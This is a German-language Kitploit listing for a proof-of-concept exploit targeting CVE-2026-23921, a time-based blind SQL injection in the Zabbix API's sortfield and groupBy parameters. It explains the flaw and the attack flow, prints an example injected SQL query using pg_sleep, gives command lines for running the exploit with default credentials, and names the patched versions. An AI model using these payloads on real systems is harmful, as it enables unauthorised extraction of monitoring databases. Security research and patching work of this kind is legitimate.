Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23921 — Proof-of-Concept-Exploit für CVE-2026-23921, eine zeitbasierte blinde SQL-Injection in der Zabbix-API über den Parameter sortfield, die die Datenextraktion aus PostgreSQL- und MySQL-Backends ermöglicht. | Kitploit
Tools/GitHubGitHub/qucklecrabik/cve-2026-23921
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsDatenbanksicherheit
GitHubqucklecrabik/cve-2026-23921

CVE-2026-23921

Proof-of-Concept-Exploit für CVE-2026-23921, eine zeitbasierte blinde SQL-Injection in der Zabbix-API über den Parameter sortfield, die die Datenextraktion aus PostgreSQL- und MySQL-Backends ermöglicht.

Repository anzeigen
8vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23921 — Zabbix zeitbasierte blinde SQL-Injection

Betroffene Versionen: Zabbix < 7.0.22 / < 7.2.15 / < 7.4.6
CVSS: Hoch
Typ: Zeitbasierte blinde SQL-Injection über den Parameter sortfield
Authentifizierung erforderlich: Ja (jeder API-Benutzer; Super Admin vermeidet Berechtigungs-Joins)

Schwachstelle

Legacy-Zabbix-API-Dienste (host.get, trigger.get, item.get usw.) akzeptieren einen nicht deklarierten Parameter groupBy über zbx_array_merge(). In CApiService::applyQuerySortOptions() ersetzt das groupBy-Array die fest codierte Whitelist, die zur Validierung von verwendet wird. Ein Angreifer übergibt dieselbe SQL-Nutzlast sowohl in als auch in — die Validierung läuft gegen die vom Angreifer kontrollierte Liste durch, und die Nutzlast gelangt unescaped in .

sortfield
groupBy
sortfield
ORDER BY

Angriffsablauf

  1. Angreifer sendet groupBy: ["hostid,(SELECT IF(...))--"] und sortfield: "hostid,(SELECT IF(...))--" mit countOutput: true
  2. zbx_array_merge behält den nicht deklarierten Schlüssel groupBy bei
  3. applyQuerySortOptions erstellt die Whitelist aus groupBy → Validierung läuft durch
  4. applyQuerySortField hängt die Nutzlast an ORDER BY an
  5. createSelectQueryFromParts erstellt das finale SQL ohne Escaping

Resultierendes SQL (PostgreSQL)

root@kitploit:~
SELECT COUNT(*) AS rowscount
FROM hosts h
WHERE h.flags IN (0,4)
ORDER BY h.hostid,(SELECT CASE WHEN ascii(substring(version() FROM 1 FOR 1))>50
                   THEN pg_sleep(3) ELSE pg_sleep(0) END)--

Verwendung

root@kitploit:~
# PostgreSQL-Backend (Standard)
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db pgsql

# MySQL-Backend
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db mysql

# Vorhandenes Auth-Token
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --auth <token> --db pgsql

# Beliebigen Ausdruck extrahieren
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db pgsql \
    --expr "current_user"

# Andere API-Methode verwenden
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db mysql \
    --method trigger.get --sort-col triggerid

Fix

Aktualisieren Sie auf Zabbix 7.0.22 / 7.2.15 / 7.4.6 oder höher.

Der Patch ersetzt array_merge($options['groupBy'], ...) durch array_intersect($this->sortColumns, $options['groupBy']), sodass vom Angreifer gelieferte Werte niemals in die Whitelist gelangen. Zusätzliche Typprüfungen mit is_string() und is_array() wurden als Defense-in-Depth hinzugefügt.

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Tool herunterladen